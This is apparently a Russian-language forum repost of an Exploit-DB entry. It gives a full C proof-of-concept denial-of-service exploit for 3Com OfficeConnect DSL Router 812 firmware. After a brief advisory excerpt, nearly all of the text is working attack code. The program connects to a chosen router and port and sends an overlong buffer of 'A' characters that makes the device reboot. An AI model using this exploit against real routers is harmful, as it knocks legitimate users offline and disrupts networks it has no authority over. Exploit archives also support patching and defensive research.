Exploit 3Com DSL Router 812 1.1.7/1.1.9/2.0 - Administrative Interface Long Request Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
22947
Проверка EDB
  1. Пройдено
Автор
DAVID F.MADRID
Тип уязвимости
DOS
Платформа
HARDWARE
CVE
N/A
Дата публикации
2003-07-21
C:
// source: https://www.securityfocus.com/bid/8248/info

A problem in the 3Com 812 OfficeConnect has been reported that may result in the router becoming unstable. Because of this, an attacker may be able to deny service to legitimate users of the vulnerable router by submitting an excessively long request.

/* 3com-DoS.c
 *
 * PoC DoS exploit for 3Com OfficeConnect DSL Routers.
 This PoC exploit the
 * vulnerability documented at:
<https://www.securityfocus.com/bid/8248>,
 * discovered by David F. Madrid.
 *
 * Successful exploitation of the vulnerability should
cause the router to
 * reboot.  It is not believed that arbitrary code
execution is possible -
 * check advisory for more information.
 *
 * -shaun2k2
 */


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
        if(argc < 3) {
                printf("3Com OfficeConnect DSL Router DoS exploit by
shaun2k2 - <[email protected]>\n\n");
                printf("Usage: 3comDoS <3com_router> <port>\n");
                exit(-1);
        }

        int sock;
        char explbuf[521];
        struct sockaddr_in dest;
        struct hostent *he;

        if((he = gethostbyname(argv[1])) == NULL) {
                printf("Couldn't resolve %s!\n", argv[1]);
                exit(-1);
        }

        if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                perror("socket()");
                exit(-1);
        }

        printf("3Com OfficeConnect DSL Router DoS exploit by
shaun2k2 - <[email protected]>\n\n");

        dest.sin_addr = *((struct in_addr *)he->h_addr);
        dest.sin_port = htons(atoi(argv[2]));
        dest.sin_family = AF_INET;

        printf("[+] Crafting exploit buffer.\n");
        memset(explbuf, 'A', 512);
        memcpy(explbuf+512, "\n\n\n\n\n\n\n\n", 8);

        if(connect(sock, (struct sockaddr *)&dest,
sizeof(struct sockaddr)) == -1) {
                perror("connect()");
                exit(-1);
        }

        printf("[+] Connected...Sending exploit buffer!\n");
        send(sock, explbuf, strlen(explbuf), 0);
        sleep(2);
        close(sock);
        printf("\n[+] Exploit buffer sent!\n");
        return(0);
}
 
Источник
www.exploit-db.com

Похожие темы